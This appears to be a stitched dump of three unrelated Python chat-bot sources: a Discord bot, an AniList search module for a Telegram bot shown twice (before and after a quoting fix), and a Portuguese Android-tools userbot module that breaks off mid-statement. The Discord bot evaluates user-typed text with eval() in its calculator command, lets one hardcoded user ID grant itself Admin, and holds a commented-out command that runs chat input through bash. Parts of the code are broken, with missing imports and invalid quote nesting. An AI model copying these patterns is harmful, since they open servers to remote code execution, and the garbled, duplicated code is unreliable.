from discord.ext.commands.errors import MissingAnyRole, MissingPermissions, MissingRole
import pyowm
import pyowm.weatherapi25.observation
import ai_m2
import random
from discord.ext import commands
from settings_manager import SettingsManager
from pyowm import OWM
from math import *
from dotenv import load_dotenv
from youtube import search as searchy, subprocess as sb
load_dotenv()
TOKEN=os.getenv("TOKEN")
bot = commands.Bot(command_prefix='b')
r=random.random
#DB=int(os.getenv("DBID"))
key=os.getenv("KEY")
owm=OWM(key)
owm=owm.weather_manager()
sm = SettingsManager()
def get_bool(s: str) -> bool:
if s.lower() in ["t", "true", "yes", "y", "enable", "on"]:
return True
return False
def tes(f: Callable) -> Callable:
print(f, f.name)
return f
def get_role(guild, name):
tc = discord.utils.find(lambda g: g.name==name, guild.roles)
return tc
def get_channel(guild, id):
tc = discord.utils.find(lambda g: g.id==id, guild.channels)
return tc
async def error(ctx, error):
print(error)
em=Embed(title="Error!", description='*The following error has occured* **'+repr(error).replace('*','\\*')+'**', url="https://discord.gg/VXFsKzf", color=0xff0000)
if not (isinstance(error, commands.ArgumentParsingError) or isinstance(error, commands.MissingRequiredArgument) or isinstance(error, MissingRole) or isinstance(error, MissingAnyRole) or isinstance(error, MissingPermissions)):
em.set_footer(text="**Please report this to the dev**\nClick on the title to get the report server invite")
await ctx.send(embed=em)
@bot.command(name='.',help='talk to velcem', )
async def on_message(ctx: commands.Context, *messages):
async with ctx.typing():
message=" ".join(messages)
print(message)
await ctx.send(ai_m2.reply(message))
@bot.command(name='.roll_dice', help='Simulates rolling dice.', )
async def roll(ctx, number_of_dice: int, number_of_sides: int):
await ctx.trigger_typing()
dice = [
str(random.choice(range(1, number_of_sides + 1)))
for _ in range(number_of_dice)
]
await ctx.send(', '.join(dice))
@bot.command(name='.calculate', help='Does simple math stuff')
async def calc(ctx, string: str):
await ctx.trigger_typing()
await ctx.send(str(eval(string)))
@bot.command(name='.create-channel')
async def create_channel(ctx, channel_name='!stonks_chennel'):
auth_roles = [x.name for x in ctx.author.roles]
print("Coder" in auth_roles,auth_roles)
if not ("Edminh" in auth_roles or "Programmer" in auth_roles):
return
guild = ctx.guild
print(ctx.command,ctx.command.__dict__)
existing_channel = discord.utils.get(guild.channels, name=channel_name)
if not existing_channel:
print(f'Creating a new channel: {channel_name}')
catg = discord.utils.get(guild.categories, name="chat")
await guild.create_text_channel(channel_name,category=catg)
@bot.command(name=".info",help="get server and user info")
async def info(ctx: commands.Context):
await ctx.trigger_typing()
ret = f"Guild id:- {ctx.guild.id}\nMembers:\n- "
ret += "- ".join([f"{member.name} {member.status}" for member in ctx.guild.members])
await ctx.send(ret)
@bot.command(name=".weather")
async def weather(ctx,city: str):
await ctx.send(
embed=Embed(
title="This command is under testing",
description="due to the recent updates to the Open Weather api, the bot's weather api is broken, but still a new api is under work",
color=0x0000ff
)
)
async with ctx.typing():
obs: pyowm.weatherapi25.observation.Observation=owm.weather_at_place(city)
print(obs)
await ctx.send(repr(obs))
ret: pyowm.weatherapi25.observation.weather.Weather = obs.weather
print(ret)
await ctx.send(f'the weather conditions will most likely be {ret["detailed_status"]},\nTemperature will remain around {ret["temperature"]["temp"]-273.15}\u00b0C, Humidity {ret["humidity"]}%. Winds will blow at {ret["wind"]["speed"]*3.6} kph at {ret["wind"]["deg"]}\u00b0 from North')
@bot.command(name="connect")
async def connect(ctx, chan: discord.VoiceChannel):
vc=ctx.voice_client
if vc:
await vc.move_to(chan)
else:
await chan.connect()
vc=ctx.voice_client
vc.play(discord.FFmpegPCMAudio('text.mp3'), after=(lambda e: print(f"Finished playing: {e}")))
# Lets set the volume to 1
vc.source = discord.PCMVolumeTransformer(vc.source)
vc.source.volume = 1
@bot.command()
async def search(ctx, query: str):
async with ctx.typing():
await ctx.send("searching...")
await ctx.send(repr(await searchy(ctx, query)))
@bot.command()
async def play(ctx, chan: discord.VoiceChannel, query: str, key: str=""):
await search(ctx, query, key)
await connect(ctx, chan)
@bot.command()
async def repeat(ctx: commands.Context, message: str, number: int=1):
if ctx.author.id != 303140523038998529 and number>=10:
await ctx.trigger_typing()
await ctx.send("Sorry but you dont have permissions to get more than 10 repeats")
return
async with ctx.typing():
for i in range(number):
await ctx.send(message)
@bot.command()
async def make_me_admin(ctx):
await ctx.trigger_typing()
print(ctx)
if ctx.author.id == 303140523038998529:
await ctx.author.add_roles(role:=get_role(ctx.guild,"Admin"))
print(role)
else:
await ctx.send("No. Imma lazy and don't want to")
@bot.command()
async def what_are_my_roles(ctx):
await ctx.trigger_typing()
await ctx.send("\n".join([x.name.lstrip("@") for x in ctx.author.roles]))
@bot.command()
async def disconnect(ctx):
vc=ctx.voice_client
await vc.disconnect()
#@bot.command()
#async def execute(ctx, *command):
# async with ctx.typing():
# auth_roles = [x.name for x in ctx.author.roles]
# print("Coder" in auth_roles,auth_roles)
# if not ("Edminh" in auth_roles or "Programmer" in auth_roles):
# return
# res = sb.Popen(["bash","-c",f"{' '.join(command)}"], stdout=sb.PIPE)
# while res.poll() is None:
# pass
# await ctx.send(res.stdout.read().decode())
@bot.command()
async def alak(ctx):
await ctx.trigger_typing()
await ctx.send("Han! balak."+ctx.author.mention)
@bot.command()
async def clear(ctx, amount=2.0):
await ctx.trigger_typing()
negflag, embed = False, None
if amount < 0:
embed = discord.Embed(title="Negative", description=f"your given value was negative, so I took the absolute value **{-amount}**", color=0xcc0000)
amount = -amount
negflag = True
amount = round(amount)
if amount > 100:
embed = discord.Embed(title="Overflow", description=f"Amount too large **{-amount}**\nNot allowed", color=0xcc0000)
await ctx.send(emed=embed)
await ctx.channel.purge(limit=amount)
if negflag:
await ctx.send(embed=embed)
await ctx.send(f"**__{amount}__** messages were deleted")
@bot.command(name=".kick")
async def perms(ctx: commands.Context, user: discord.Member, reason: str):
await ctx.trigger_typing()
user_can: discord.Permissions = ctx.author.permissions_in(ctx.channel)
if user_can.kick_members:
embed = discord.Embed(title="Kicked!", description=f"**{user.name}** was kicked by {ctx.author.mention}", color=0xcc2222)
embed.set_thumbnail(url=user.avatar_url)
embed.add_field(name="Reason", value=reason)
await ctx.send(embed=embed)
await user.kick(reason=reason)
chan: discord.DMChannel = await user.create_dm()
await chan.trigger_typing()
await chan.send(f"You kicked by __{ctx.author.mention}__ from {ctx.guild.name}\nfor {reason}")
else:
embed = discord.Embed(title="Denied!", description=f"{ctx.author.mention}, you arent allowed to kick", color=0xcc0055)
await ctx.send(embed=embed)
@bot.command(name=".settings", aliases=[".s"])
async def settings(ctx: commands.Context, *args):
print(args)
with sm as s:
for arg in args:
if "=" in arg:
key, value = arg.split("=")
if key == "system_channel":
c = int(value[value.index("#")+1:-1])
print(c)
s.set_sys_channel(ctx.guild.id, c)
await ctx.send("**Done!**")
elif key == "announcement_channel":
c = int(value[value.index("#")+1:-1])
print(c)
s.set_ann_channel(ctx.guild.id, c)
await ctx.send("**Done!**")
elif key == "greet":
s.set_greet(ctx.guild.id, get_bool(value))
await ctx.send("**Done!**")
elif key == "mute on ping":
s.set_mute_everyone(ctx.guild.id, get_bool(value))
await ctx.send("**Done!**")
else:
embed = discord.Embed(title="Error!", description=f"incorrect key!", color=0xcc0055)
await ctx.send(embed=embed)
@bot.command(".announce", aliases=[".ann"])
async def announce(ctx: commands.Context, text: str, *args):
with sm as s:
chan: Union[discord.TextChannel, None] = None
if (cha_id := s.get_ann_channel(str(ctx.guild.id))) is not None:
chan = get_channel(ctx.guild, cha_id)
else:
chan = ctx.guild.system_channel
await chan.trigger_typing()
reactor = {}
for emoji, role in map(lambda x: x.split("="), args):
reactor[emoji.strip()] = role.strip()
embed = Embed(title=f"Announcement by {ctx.author.name}", description=text, color=0x0000ff)
embed.add_field(name="Reactions", value="\n\t".join(args) or "none")
msg: discord.Message = await chan.send(embed=embed)
print(msg, reactor)
s.add_reactor_channel(str(ctx.guild.id), str(msg.id), reactor)
@bot.command(name=".report", aliases=[".r", "r"])
async def report(ctx,text: discord.Message):
await text.add_reaction("😠")
@bot.command()
async def please_unmute(ctx: commands.Context):
guild = ctx.guild
with sm as s:
cha_id = s.get_sys_channel(str(guild.id))
if cha_id is not None:
cha: discord.TextChannel = get_channel(guild, cha_id)
await cha.send(f"**Alert __Admins__**,\n {ctx.author.mention} wants to be unmuted, if his punishment is complete please unmute him")
else:
await guild.system_channel.send(f"**Alert __Admins__**,\n {ctx.author.mention} wants to be unmuted, if his punishment is complete please unmute him")
@bot.command()
async def test(ctx: commands.Context):
async for entry in ctx.guild.audit_logs(limit=100):
print(entry.__dict__)
await ctx.send("***This is a testing/ developement command, if you aren't the developers of this don't use it***")
raise BaseException("lol")
class Miscellaneous:
@bot.command(aliases=[".v"])
async def version(ctx):
await ctx.send("1.0.9")
@bot.command(aliases=["inv",".inv",".invite"])
async def invite(ctx):
em=Embed(title="Invite Balak[click here for instant invite]", description="to invite balak open the following \/ link in your browser or click the title\nhttps://top.gg/bot/749640022751182868/invite", url="https://top.gg/bot/749640022751182868/invite")
await ctx.send(embed=em)
@bot.command(aliases=[".vote"])
async def vote(ctx):
em=Embed(title="Vote Balak[click here for instant link]", description="to vote balak open the following \/ link in your browser or click the title\nhttps://top.gg/bot/749640022751182868/vote", url="https://top.gg/bot/749640022751182868/vote")
await ctx.send(embed=em)
@bot.command(aliases=[".vote"])
async def vote(ctx):
em=Embed(title="Source code of Balak[click here for instant link]", description="to view balak's source open the following \/ link in your browser or click the title\nhttps://github.com/ayushashi11/balak", url="https://github.com/ayushashi11/balak")
await ctx.send(embed=em)
bot.add_cog(Miscellaneous())
for command in bot.commands:
command.error(error)
bot.run(TOKEN)
|
# Part of Pull Req #2 by @MaskedVirus | github.com/swatv3nub
import time
from datetime import timedelta
import requests
from pyrogram import filters
from pyrogram.types import InlineKeyboardButton, InlineKeyboardMarkup
from wbb import app
from wbb.core.decorators.errors import capture_err
__MODULE__ = "Anime"
__HELP__ = """
/anime - search anime on AniList
/manga - search manga on Anilist
/char - search character on Anilist
"""
def shorten(description, info="anilist.co"):
ms_g = ""
if len(description) > 700:
description = description[0:500] + "...."
ms_g += (
f"\n**Description**: __{description}__[More here]({info})"
)
else:
ms_g += f"\n**Description**: __{description}__"
return (
ms_g.replace("<br>", "")
.replace("</br>", "")
.replace("<i>", "")
.replace("</i>", "")
)
def t(milliseconds: int) -> str:
"""Inputs time in milliseconds, to get beautified time,
as string"""
seconds, milliseconds = divmod(int(milliseconds), 1000)
minutes, seconds = divmod(seconds, 60)
hours, minutes = divmod(minutes, 60)
days, hours = divmod(hours, 24)
tmp = (
((str(days) + " Days, ") if days else "")
+ ((str(hours) + " Hours, ") if hours else "")
+ ((str(minutes) + " Minutes, ") if minutes else "")
+ ((str(seconds) + " Seconds, ") if seconds else "")
+ ((str(milliseconds) + " ms, ") if milliseconds else "")
)
return tmp[:-2]
airing_query = """
query ($id: Int,$search: String) {
Media (id: $id, type: ANIME,search: $search) {
id
episodes
title {
romaji
english
native
}
siteUrl
nextAiringEpisode {
airingAt
timeUntilAiring
episode
}
}
}
"""
fav_query = """
query ($id: Int) {
Media (id: $id, type: ANIME) {
id
title {
romaji
english
native
}
}
}
"""
anime_query = """
query ($id: Int,$search: String) {
Media (id: $id, type: ANIME,search: $search) {
id
idMal
title {
romaji
english
native
}
description (asHtml: false)
startDate{
year
}
episodes
season
type
format
status
duration
siteUrl
studios{
nodes{
name
}
}
trailer{
id
site
thumbnail
}
averageScore
genres
bannerImage
}
}
"""
character_query = """
query ($query: String) {
Character (search: $query) {
id
name {
first
last
full
}
siteUrl
favourites
image {
large
}
description
}
}
"""
manga_query = """
query ($id: Int,$search: String) {
Media (id: $id, type: MANGA,search: $search) {
id
title {
romaji
english
native
}
description (asHtml: false)
startDate{
year
}
type
format
status
siteUrl
averageScore
genres
bannerImage
}
}
"""
def format_bytes(size):
size = int(size)
power = 1024
n = 0
power_labels = {0: "", 1: "K", 2: "M", 3: "G", 4: "T"}
while size > power:
size /= power
n += 1
return f"{size:.2f} {power_labels[n]+"B"}"
def return_progress_string(current, total):
filled_length = int(30 * current // total)
return (
"[" + "=" * filled_length + " " * (30 - filled_length) + "]"
)
def calculate_eta(current, total, start_time):
if not current:
return "00:00:00"
end_time = time.time()
elapsed_time = end_time - start_time
seconds = (elapsed_time * (total / current)) - elapsed_time
thing = "".join(
str(timedelta(seconds=seconds)).split(".")[:-1]
).split(", ")
thing[-1] = thing[-1].rjust(8, "0")
return ", ".join(thing)
url = "https://graphql.anilist.co"
@app.on_message(filters.command("anime"))
@capture_err
async def anime_search(_, message):
if len(message.command) < 2:
await message.delete()
return
search = message.text.split(None, 1)[1]
variables = {"search": search}
json = (
requests.post(
url, json={"query": anime_query, "variables": variables}
)
.json()["data"]
.get("Media", None)
)
if json:
msg = f"**{json["title"]["romaji"]}**(`{json["title"]["native"]}`)\n**Type**: {json["format"]}\n**Status**: {json["status"]}\n**Episodes**: {json.get("episodes", "N/A")}\n**Duration**: {json.get("duration", "N/A")} Per Ep.\n**Score**: {json["averageScore"]}\n**Genres**: `"
for x in json["genres"]:
msg += f"{x}, "
msg = msg[:-2] + "`\n"
msg += "**Studios**: `"
for x in json["studios"]["nodes"]:
msg += f"{x["name"]}, "
msg = msg[:-2] + "`\n"
info = json.get("siteUrl")
trailer = json.get("trailer", None)
if trailer:
trailer_id = trailer.get("id", None)
site = trailer.get("site", None)
if site == "youtube":
trailer = "https://youtu.be/" + trailer_id
description = (
json.get("description", "N/A")
.replace("<i>", "")
.replace("</i>", "")
.replace("<br>", "")
)
msg += shorten(description, info)
image = info.replace(
"anilist.co/anime/", "img.anili.st/media/"
)
if trailer:
buttons = [
[
InlineKeyboardButton("More Info", url=info),
InlineKeyboardButton("Trailer", url=trailer),
]
]
else:
buttons = [[InlineKeyboardButton("More Info", url=info)]]
if image:
try:
await message.reply_photo(
image,
caption=msg,
reply_markup=InlineKeyboardMarkup(buttons),
)
except Exception:
msg += f" [✔️️]({image})"
await message.edit(msg)
else:
await message.edit(msg)
@app.on_message(filters.command("manga"))
@capture_err
async def manga_search(_, message):
if len(message.command) < 2:
await message.delete()
return
search = message.text.split(None, 1)[1]
variables = {"search": search}
json = (
requests.post(
url, json={"query": manga_query, "variables": variables}
)
.json()["data"]
.get("Media", None)
)
ms_g = ""
if json:
title, title_native = json["title"].get(
"romaji", False
), json["title"].get("native", False)
start_date, status, score = (
json["startDate"].get("year", False),
json.get("status", False),
json.get("averageScore", False),
)
if title:
ms_g += f"**{title}**"
if title_native:
ms_g += f"(`{title_native}`)"
if start_date:
ms_g += f"\n**Start Date** - `{start_date}`"
if status:
ms_g += f"\n**Status** - `{status}`"
if score:
ms_g += f"\n**Score** - `{score}`"
ms_g += "\n**Genres** - "
for x in json.get("genres", []):
ms_g += f"{x}, "
ms_g = ms_g[:-2]
image = json.get("bannerImage", False)
ms_g += f"_{json.get("description", None)}_"
if image:
try:
await message.reply_photo(image, caption=ms_g)
except Exception:
ms_g += f" [✔️️]({image})"
await message.reply(ms_g)
else:
await message.reply(ms_g)
@app.on_message(filters.command("char"))
@capture_err
async def character_search(_, message):
if len(message.command) < 2:
await message.delete()
return
search = message.text.split(None, 1)[1]
variables = {"query": search}
json = (
requests.post(
url,
json={"query": character_query, "variables": variables},
)
.json()["data"]
.get("Character", None)
)
if json:
ms_g = f"**{json.get("name").get("full")}**(`{json.get("name").get("native")}`)\n"
description = f"{json["description"]}"
site_url = json.get("siteUrl")
ms_g += shorten(description, site_url)
image = json.get("image", None)
if image:
image = image.get("large")
await message.reply_photo(image, caption=ms_g)
else:
await message.reply(ms_g)
| # Part of Pull Req #2 by @MaskedVirus | github.com/swatv3nub
import time
from datetime import timedelta
import requests
from pyrogram import filters
from pyrogram.types import InlineKeyboardButton, InlineKeyboardMarkup
from wbb import app
from wbb.core.decorators.errors import capture_err
__MODULE__ = "Anime"
__HELP__ = """
/anime - search anime on AniList
/manga - search manga on Anilist
/char - search character on Anilist
"""
def shorten(description, info="anilist.co"):
ms_g = ""
if len(description) > 700:
description = description[0:500] + "...."
ms_g += (
f"\n**Description**: __{description}__[More here]({info})"
)
else:
ms_g += f"\n**Description**: __{description}__"
return (
ms_g.replace("<br>", "")
.replace("</br>", "")
.replace("<i>", "")
.replace("</i>", "")
)
def t(milliseconds: int) -> str:
"""Inputs time in milliseconds, to get beautified time,
as string"""
seconds, milliseconds = divmod(int(milliseconds), 1000)
minutes, seconds = divmod(seconds, 60)
hours, minutes = divmod(minutes, 60)
days, hours = divmod(hours, 24)
tmp = (
((str(days) + " Days, ") if days else "")
+ ((str(hours) + " Hours, ") if hours else "")
+ ((str(minutes) + " Minutes, ") if minutes else "")
+ ((str(seconds) + " Seconds, ") if seconds else "")
+ ((str(milliseconds) + " ms, ") if milliseconds else "")
)
return tmp[:-2]
airing_query = """
query ($id: Int,$search: String) {
Media (id: $id, type: ANIME,search: $search) {
id
episodes
title {
romaji
english
native
}
siteUrl
nextAiringEpisode {
airingAt
timeUntilAiring
episode
}
}
}
"""
fav_query = """
query ($id: Int) {
Media (id: $id, type: ANIME) {
id
title {
romaji
english
native
}
}
}
"""
anime_query = """
query ($id: Int,$search: String) {
Media (id: $id, type: ANIME,search: $search) {
id
idMal
title {
romaji
english
native
}
description (asHtml: false)
startDate{
year
}
episodes
season
type
format
status
duration
siteUrl
studios{
nodes{
name
}
}
trailer{
id
site
thumbnail
}
averageScore
genres
bannerImage
}
}
"""
character_query = """
query ($query: String) {
Character (search: $query) {
id
name {
first
last
full
}
siteUrl
favourites
image {
large
}
description
}
}
"""
manga_query = """
query ($id: Int,$search: String) {
Media (id: $id, type: MANGA,search: $search) {
id
title {
romaji
english
native
}
description (asHtml: false)
startDate{
year
}
type
format
status
siteUrl
averageScore
genres
bannerImage
}
}
"""
def format_bytes(size):
size = int(size)
power = 1024
n = 0
power_labels = {0: "", 1: "K", 2: "M", 3: "G", 4: "T"}
while size > power:
size /= power
n += 1
return f"{size:.2f} {power_labels[n]+'B'}"
def return_progress_string(current, total):
filled_length = int(30 * current // total)
return (
"[" + "=" * filled_length + " " * (30 - filled_length) + "]"
)
def calculate_eta(current, total, start_time):
if not current:
return "00:00:00"
end_time = time.time()
elapsed_time = end_time - start_time
seconds = (elapsed_time * (total / current)) - elapsed_time
thing = "".join(
str(timedelta(seconds=seconds)).split(".")[:-1]
).split(", ")
thing[-1] = thing[-1].rjust(8, "0")
return ", ".join(thing)
url = "https://graphql.anilist.co"
@app.on_message(filters.command("anime"))
@capture_err
async def anime_search(_, message):
if len(message.command) < 2:
await message.delete()
return
search = message.text.split(None, 1)[1]
variables = {"search": search}
json = (
requests.post(
url, json={"query": anime_query, "variables": variables}
)
.json()["data"]
.get("Media", None)
)
if json:
msg = f"**{json['title']['romaji']}**(`{json['title']['native']}`)\n**Type**: {json['format']}\n**Status**: {json['status']}\n**Episodes**: {json.get('episodes', 'N/A')}\n**Duration**: {json.get('duration', 'N/A')} Per Ep.\n**Score**: {json['averageScore']}\n**Genres**: `"
for x in json["genres"]:
msg += f"{x}, "
msg = msg[:-2] + "`\n"
msg += "**Studios**: `"
for x in json["studios"]["nodes"]:
msg += f"{x['name']}, "
msg = msg[:-2] + "`\n"
info = json.get("siteUrl")
trailer = json.get("trailer", None)
if trailer:
trailer_id = trailer.get("id", None)
site = trailer.get("site", None)
if site == "youtube":
trailer = "https://youtu.be/" + trailer_id
description = (
json.get("description", "N/A")
.replace("<i>", "")
.replace("</i>", "")
.replace("<br>", "")
)
msg += shorten(description, info)
image = info.replace(
"anilist.co/anime/", "img.anili.st/media/"
)
if trailer:
buttons = [
[
InlineKeyboardButton("More Info", url=info),
InlineKeyboardButton("Trailer", url=trailer),
]
]
else:
buttons = [[InlineKeyboardButton("More Info", url=info)]]
if image:
try:
await message.reply_photo(
image,
caption=msg,
reply_markup=InlineKeyboardMarkup(buttons),
)
except Exception:
msg += f" [✔️️]({image})"
await message.edit(msg)
else:
await message.edit(msg)
@app.on_message(filters.command("manga"))
@capture_err
async def manga_search(_, message):
if len(message.command) < 2:
await message.delete()
return
search = message.text.split(None, 1)[1]
variables = {"search": search}
json = (
requests.post(
url, json={"query": manga_query, "variables": variables}
)
.json()["data"]
.get("Media", None)
)
ms_g = ""
if json:
title, title_native = json["title"].get(
"romaji", False
), json["title"].get("native", False)
start_date, status, score = (
json["startDate"].get("year", False),
json.get("status", False),
json.get("averageScore", False),
)
if title:
ms_g += f"**{title}**"
if title_native:
ms_g += f"(`{title_native}`)"
if start_date:
ms_g += f"\n**Start Date** - `{start_date}`"
if status:
ms_g += f"\n**Status** - `{status}`"
if score:
ms_g += f"\n**Score** - `{score}`"
ms_g += "\n**Genres** - "
for x in json.get("genres", []):
ms_g += f"{x}, "
ms_g = ms_g[:-2]
image = json.get("bannerImage", False)
ms_g += f"_{json.get('description', None)}_"
if image:
try:
await message.reply_photo(image, caption=ms_g)
except Exception:
ms_g += f" [✔️️]({image})"
await message.reply(ms_g)
else:
await message.reply(ms_g)
@app.on_message(filters.command("char"))
@capture_err
async def character_search(_, message):
if len(message.command) < 2:
await message.delete()
return
search = message.text.split(None, 1)[1]
variables = {"query": search}
json = (
requests.post(
url,
json={"query": character_query, "variables": variables},
)
.json()["data"]
.get("Character", None)
)
if json:
ms_g = f"**{json.get('name').get('full')}**(`{json.get('name').get('native')}`)\n"
description = f"{json['description']}"
site_url = json.get("siteUrl")
ms_g += shorten(description, site_url)
image = json.get("image", None)
if image:
image = image.get("large")
await message.reply_photo(image, caption=ms_g)
else:
await message.reply(ms_g)
|
# Copyright (C) 2019 The Raphielscape Company LLC.
#
# Licensed under the Raphielscape Public License, Version 1.d (the "License");
# you may not use this file except in compliance with the License.
#
""" Userbot module containing commands related to android"""
import asyncio
import json
import math
import os
import re
import time
from bs4 import BeautifulSoup
from requests import get
from userbot import CMD_HELP, TEMP_DOWNLOAD_DIRECTORY
from userbot.events import register
from userbot.utils import chrome, human_to_bytes, humanbytes, md5, time_formatter
GITHUB = "https://github.com"
@register(outgoing=True, pattern=r"^\.magisk$")
async def magisk(request):
magisk_dict = {
"Stable": "https://raw.githubusercontent.com/topjohnwu/magisk_files/master/stable.json",
"Beta": "https://raw.githubusercontent.com/topjohnwu/magisk_files/master/beta.json",
"Canary": "https://raw.githubusercontent.com/topjohnwu/magisk_files/canary/canary.json",
}
releases = "Últimos lançamentos do Magisk:\n"
for name, release_url in magisk_dict.items():
data = get(release_url).json()
if str(name) == "Canary":
data["magisk"]["link"] = (
"https://github.com/topjohnwu/magisk_files/raw/canary/"
+ data["magisk"]["link"]
)
data["app"]["link"] = (
"https://github.com/topjohnwu/magisk_files/raw/canary/"
+ data["app"]["link"]
)
data["uninstaller"]["link"] = (
"https://github.com/topjohnwu/magisk_files/raw/canary/"
+ data["uninstaller"]["link"]
)
releases += (
f'{name}: [ZIP v{data['magisk']['version']}]({data['magisk']['link']}) | '
f'[APK v{data['app']['version']}]({data['app']['link']}) | '
f'[Uninstaller]({data['uninstaller']['link']})\n'
)
await request.edit(releases)
@register(outgoing=True, pattern=r"^.device(?: |$)(\S*)")
async def device_info(request):
""" informações básicas do dispositivo android pelo seu codename """
textx = await request.get_reply_message()
codename = request.pattern_match.group(1)
if codename:
pass
elif textx:
codename = textx.text
else:
await request.edit("`Uso: .device <codenome> / <modelo>`")
return
data = json.loads(
get(
"https://raw.githubusercontent.com/androidtrackers/"
"certified-android-devices/master/by_device.json"
).text
)
results = data.get(codename)
if results:
reply = f"**Resultados da pesquisa por {codename}**:\n\n"
for item in results:
reply += (
f"**Marca**: {item["brand"]}\n"
f"**Nome**: {item["name"]}\n"
f"**Modelo**: {item["model"]}\n\n"
)
else:
reply = f"`Sem informações sobre {codename}!`\n"
await request.edit(reply)
@register(outgoing=True, pattern=r"^.codename(?: |)([\S]*)(?: |)([\s\S]*)")
async def codename_info(request):
""" procura por codenome do dispositivo android """
textx = await request.get_reply_message()
brand = request.pattern_match.group(1).lower()
device = request.pattern_match.group(2).lower()
if brand and device:
pass
elif textx:
brand = textx.text.split(" ")[0]
device = " ".join(textx.text.split(" ")[1:])
else:
await request.edit("`Uso: .codename <marca> <dispositivo>`")
return
data = json.loads(
get(
"https://raw.githubusercontent.com/androidtrackers/"
"certified-android-devices/master/by_brand.json"
).text
)
devices_lower = {k.lower(): v for k, v in data.items()} # Lower brand names in JSON
devices = devices_lower.get(brand)
results = [
i
for i in devices
if i["name"].lower() == device.lower() or i["model"].lower() == device.lower()
]
if results:
reply = f"**Resultados da pesquisa por {brand} {device}**:\n\n"
if len(results) > 8:
results = results[:8]
for item in results:
reply += (
f"**Dispositivo**: {item["device"]}\n"
f"**Nome**: {item["name"]}\n"
f"**Modelo**: {item["model"]}\n\n"
)
else:
reply = f"`Sem resultados para {device} codename!`\n"
await request.edit(reply)
@register(outgoing=True, pattern="^.pixeldl(?: |$)(.*)")
async def download_api(dl):
await dl.edit("`Coletando informações...`")
URL = dl.pattern_match.group(1)
URL_MSG = await dl.get_reply_message()
if URL:
pass
elif URL_MSG:
URL = URL_MSG.text
else:
await dl.edit("`Informação vazia...`")
return
if not re.findall(r"\bhttps?://download.*pixelexperience.*\.org\S+", URL):
await dl.edit("`Informação inválida...`")
return
driver = await chrome()
await dl.edit("`Obtendo informações...`")
driver.get(URL)
error = driver.find_elements_by_class_name("swal2-content")
if len(error) > 0:
if error[0].text == "Arquivo Inválido.":
await dl.edit(f"`FileNotFoundError`: {URL} inválido.")
return
datas = driver.find_elements_by_class_name("download__meta")
""" - enumere os dados para ter certeza de que o download corresponda com a versão - """
md5_origin = None
i = None
for index, value in enumerate(datas):
for data in value.text.split("\n"):
if data.startswith("MD5"):
md5_origin = data.split(":")[1].strip()
i = index
break
if md5_origin is not None and i is not None:
break
if md5_origin is None and i is None:
await dl.edit("`Não há versão equivalente disponível...`")
if URL.endswith("/"):
file_name = URL.split("/")[-2]
else:
file_name = URL.split("/")[-1]
file_path = TEMP_DOWNLOAD_DIRECTORY + file_name
download = driver.find_elements_by_class_name("download__btn")[i]
download.click()
await dl.edit("`Começando download...`")
file_size = human_to_bytes(download.text.split(None, 3)[-1].strip("()"))
display_message = None
complete = False
start = time.time()
while complete is False:
if os.path.isfile(file_path + ".crdownload"):
try:
downloaded = os.stat(file_path + ".crdownload").st_size
status = "Baixando"
except OSError: # Rare case
await asyncio.sleep(1)
continue
elif os.path.isfile(file_path):
downloaded = os.stat(file_path).st_size
file_size = downloaded
status = "Checando"
else:
await asyncio.sleep(0.3)
continue
diff = time.time() - start
percentage = downloaded / file_size * 100
speed = round(downloaded / diff, 2)
eta = round((file_size - downloaded) / speed)
prog_str = "`{0}` | [{1}{2}] `{3}%`".format(
status,
"".join(["■" for i in range(math.floor(percentage / 10))]),
"".join(["▨" for i in range(10 - math.floor(percentage / 10))]),
round(percentage, 2),
)
current_message = (
"`[DOWNLOAD]`\n\n"
f"`{file_name}`\n"
f"`Status`\n{prog_str}\n"
f"`{humanbytes(downloaded)} of {humanbytes(file_size)}"
f" @ {humanbytes(speed)}`\n"
f"`Tempo Estimado` -> {time_formatter(eta)}"
)
if (
round(diff % 15.00) == 0
and display_message != current_message
or (downloaded == file_size)
):
await dl.edit(current_message)
display_message = current_message
if downloaded == file_size:
if not os.path.isfile(file_path): # Rare case
await asyncio.sleep(1)
continue
MD5 = await md5(file_path)
if md5_origin == MD5:
complete = True
else:
await dl.edit("`Download corrompido...`")
os.remove(file_path)
driver.quit()
return
await dl.respond(f"`{file_name}`\n\n" f"Download finalizado em `{file_path}`.")
await dl.delete()
driver.quit()
return
@register(outgoing=True, pattern=r"^.specs(?: |)([\S]*)(?: |)([\s\S]*)")
async def devices_specifications(request):
""" Mobile devices specifications """
textx = await request.get_reply_message()
brand = request.pattern_match.group(1).lower()
device = request.pattern_match.group(2).lower()
if brand and device:
pass
elif textx:
brand = textx.text.split(" ")[0]
device = " ".join(textx.text.split(" ")[1:])
else:
await request.edit("`Uso: .specs <marca> <dispositivo>`")
return
all_brands = (
BeautifulSoup(
get("https://www.devicespecifications.com/en/brand-more").content, "lxml"
)
.find("div", {"class": "brand-listing-container-news"})
.findAll("a")
)
brand_page_url = None
try:
brand_page_url = [
i["href"] for i in all_brands if brand == i.text.strip().lower()
][0]
except IndexError:
await request.edit(f"`{brand} é uma marca desconhecida/inexistente!`")
devices = BeautifulSoup(get(brand_page_url).content, "lxml").findAll(
"div", {"class": "model-listing-container-80"}
)
device_page_url = None
try:
device_page_url = [
i.a["href"]
for i in BeautifulSoup(str(devices), "lxml").findAll("h3")
if device in i.text.strip().lower()
]
except IndexError:
await request.edit(f"`não foi possível achar {device}!`")
if len(device_page_url) > 2:
device_page_url = device_page_url[:2]
reply = ""
for url in device_page_url:
info = BeautifulSoup(get(url).content, "lxml")
reply = "\n" + info.title.text.split("-")[0].strip() + "\n"
info = info.find("div", {"id": "model-brief-specifications"})
specifications = re.findall(r"<b>.*?<br/>", str(info))
for item in specifications:
title = re.findall(r"<b>(.*?)</b>", item)[0].strip()
data = (
re.findall(r"</b>: (.*?)<br/>", item)[0]
.replace("<b>", "")
.replace("</b>", "")
.strip()
)
reply += f"**{title}**: {data}\n"
await request.edit(reply)
@register(outgoing=True, pattern=r"^.twrp(?: |$)(\S*)")
async def twrp(request):
""" get android device twrp """
textx = await request.get_reply_message()
device = request.pattern_match.group(1)
if device:
pass
elif textx:
device = textx.text.split(" ")[0]
else:
await request.edit("`Uso: .twrp <codenome>`")
return
url = get(f"https://dl.twrp.me/{device}/")
if url.status_code == 404:
reply = f"`Não foi possível achar downloads para {device}!`\n"
await request.edit(reply)
return
page = BeautifulSoup(url.content, "lxml")
download = page.find("table").find("tr").find("a")
dl_link = f"https://dl.twrp.me{download["href"]}"
dl_file = download.text
size = page.find("span", {"class": "filesize"}).text
date = page.find("em").text.strip()
reply = (
